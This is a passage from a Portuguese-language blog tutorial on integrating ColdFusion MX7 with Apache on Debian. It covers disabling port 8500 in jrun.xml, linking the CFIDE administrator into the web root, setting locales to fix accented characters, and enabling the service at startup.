o apache chame pelo index do CF.<br /><br />Reinicie o apache<br /><br />#/etc/init.d/apache2 restart<br /><br /><enter><enter><enter><enter><enter><enter><enter>Agora crie uma página .cfm em /var/www e acesse no navegador para verficar a integração.<br /><br />http://ip-servidor-coldfusion/teste.cfm<br /><br /><br />Por questões de segurança, agora que o apache está integrado com o CF, não iremos prescisar mais de conectar pela porta 8500, logo vamos desabilitar.<br /><br />Entre em:<br /><br /># cd /opt/coldfusionmx7/runtime/servers/coldfusion/SERVER-INF/<br /><br />Edite o arquivo jrun.xml<br /><br /># vi jrun.xml<br /><br />Procure pela seguinte parte:<br /><br />service class="jrun.servlet.http.WebService" name="WebService"<br />attribute name="port">8500</enter>*</enter><br />********attribute name="deactivated">false</enter> ********** ALTERE AQUI de false para true<br />attribute name="activeHandlerThreads">8</enter><br />attribute name="minHandlerThreads">1</enter><br />attribute name="maxHandlerThreads">1000</enter><br />attribute name="mapCheck">0</enter><br />attribute name="threadWaitTimeout">300<br />attribute name="backlog">500<br />attribute name="timeout">300<br />/service><br /><br /><br />A linha alterada é deactivated, que está false, coloque true.<br /><br />Reinicie o coldfusion e sua porta 8500 foi desativada.<br /><br />Para acessar o CF administrator, você pode criar um link assim:<br /><br /># ln -s /opt/coldfusionmx7/wwwroot/CFIDE/ /var/www/<br /><br /><br />Agora pode acessar:<br /><br />http://ip-servidor-coldfusion/CFIDE/administrator/<br /><br /><br />Neste momento acredito que você tenha tudo funcionando.<br /><br /><br />Problemas com acentos<br /><br />eu costumo fazer alguns procedimentos, meio que reduntantes, mas que , estranhamente<br />costumam dar problemas, caso não os faço, então se tiver problemas com acentos, veja estas mandingas para o Debian.<br /><br />Mais uma vez vamos editar o script que inicia o coldfusion em<br /><br /># vi /opt/coldfusionmx7/bin/coldfusion<br /><br />Inclua bem no início do arquivo, depois de #!/bin/sh ... estas duas linhas:<br /><br />export LC_ALL=pt_BR.ISO8859-1<br />export LANG=pt_BR.ISO8859-1<br /><br />Insira as duas linhas acima também no /etc/profile.<br /><br />Mais uma ...<br /><br />configure os locales do sistema com o comando localedef<br /><br /># localedef pt_BR -i pt_BR -f ISO-8859-1<br /><br /><br /><br />Iniciando automaticamente<br /><br /># ln -s /opt/coldfusionmx7/bin/coldfusion /etc/init.d/coldfusionmx7<br />#update-rc.d coldfusionmx7 defaults<br /><br /><br />Agora reinicie sua máquina ...<br /><br /><br />Acho que é isso .<br /><br />se tiverem algum problema entrem em contato para consertarmos o artigo...<br /><br /><br />Valeu !Emanuel Rodrigueshttp://www.blogger.com/profile/03577341256356492716noreply@blogger.com0